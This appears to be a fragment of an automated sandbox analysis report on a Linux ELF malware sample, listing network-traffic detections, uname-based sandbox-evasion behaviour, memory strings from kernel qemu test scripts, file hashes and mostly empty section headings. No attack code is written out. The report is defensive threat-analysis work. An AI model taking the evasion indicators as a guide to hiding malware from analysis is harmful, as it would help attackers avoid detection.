Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 53350 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 54390 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 49152 -> 54390

Malware Analysis System Evasion:

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /tmp/nT7K5GG5km (PID: 4587)	Queries kernel information via 'uname':	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600)	Queries kernel information via 'uname':	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4623)	Queries kernel information via 'uname':	Jump to behavior
Source: /sbin/modprobe (PID: 4639)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 5330)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 5349)	Queries kernel information via 'uname':	Jump to behavior

Source: kvm-test-1-run.sh.8.dr	Binary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
Source: functions.sh0.8.dr	Binary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: kill -KILL $qemu_pid
Source: functions.sh0.8.dr	Binary or memory string: qemu-system-ppc64)
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: echo Monitoring qemu job at pid $qemu_pid
Source: kvm.sh.8.dr	Binary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_pid=$!
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: functions.sh0.8.dr	Binary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
Source: kvm-recheck-lock.sh.8.dr	Binary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
Source: functions.sh0.8.dr	Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm.sh.8.dr	Binary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
Source: functions.sh0.8.dr	Binary or memory string: identify_qemu_append () {
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: echo Grace period for qemu job at pid $qemu_pid
Source: functions.sh0.8.dr	Binary or memory string: qemu-system-x86_64\|qemu-system-i386)
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
Source: functions.sh0.8.dr	Binary or memory string: # Returns our best guess as to which qemu command is appropriate for
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
Source: functions.sh0.8.dr	Binary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
Source: functions.sh0.8.dr	Binary or memory string: identify_qemu_args () {
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
Source: functions.sh0.8.dr	Binary or memory string: qemu-system-x86_64\|qemu-system-i386)
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: # Generate -smp qemu argument.
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
Source: functions.sh0.8.dr	Binary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
Source: functions.sh0.8.dr	Binary or memory string: # Output arguments for the qemu "-append" string based on CPU type
Source: kvm.sh.8.dr	Binary or memory string: --qemu-args\|--qemu-arg)
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
Source: functions.sh0.8.dr	Binary or memory string: echo $TORTURE_QEMU_CMD
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_MAC=$2
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid $[0-9]$.$/\1/p" $resdir/Warnings`"
Source: functions.sh0.8.dr	Binary or memory string: specify_qemu_cpus () {
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: vcpus=`identify_qemu_vcpus`
Source: functions.sh0.8.dr	Binary or memory string: echo qemu-system-ppc64
Source: functions.sh0.8.dr	Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
Source: kvm.sh.8.dr	Binary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
Source: functions.sh0.8.dr	Binary or memory string: qemu-system-ppc64)
Source: functions.sh0.8.dr	Binary or memory string: # identify_boot_image qemu-cmd
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_ARG="$2"
Source: kvm-recheck-rcu.sh.8.dr	Binary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh0.8.dr	Binary or memory string: # identify_qemu_append qemu-cmd
Source: functions.sh0.8.dr	Binary or memory string: identify_qemu_vcpus () {
Source: functions.sh0.8.dr	Binary or memory string: # qemu-args already contains "-smp".
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: functions.sh0.8.dr	Binary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
Source: functions.sh0.8.dr	Binary or memory string: echo Cannot figure out what qemu command to use! 1>&2
Source: functions.sh0.8.dr	Binary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
Source: functions.sh0.8.dr	Binary or memory string: # identify_qemu_vcpus
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_CMD="$2"
Source: functions.sh0.8.dr	Binary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
Source: functions.sh0.8.dr	Binary or memory string: # identify_qemu_args qemu-cmd serial-file
Source: functions.sh0.8.dr	Binary or memory string: if test -n "$TORTURE_QEMU_CMD"
Source: kvm.sh.8.dr	Binary or memory string: --qemu-cmd)
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_args=$5
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: # Generate qemu -append arguments
Source: functions.sh0.8.dr	Binary or memory string: # identify_qemu builddir
Source: functions.sh0.8.dr	Binary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
Source: functions.sh0.8.dr	Binary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
Source: kvm.sh.8.dr	Binary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
Source: functions.sh0.8.dr	Binary or memory string: echo qemu-system-i386
Source: functions.sh0.8.dr	Binary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
Source: functions.sh0.8.dr	Binary or memory string: echo qemu-system-x86_64
Source: functions.sh0.8.dr	Binary or memory string: identify_qemu () {

ID:	402069
Product:	CloudBasic
Start time:	20:23:58
Start date:	01.05.2021
Sample:	nT7K5GG5km
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Architecture:	LINUX
MD5:	eec5c6c219535fba3a0492ea8118b397
SHA1:	292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:	12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Filetype:	ELF Executable and Linkable format (generic) (4004/1) 100.00%

Analysis Report nT7K5GG5km

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Spreading:

Networking:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Screenshots

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs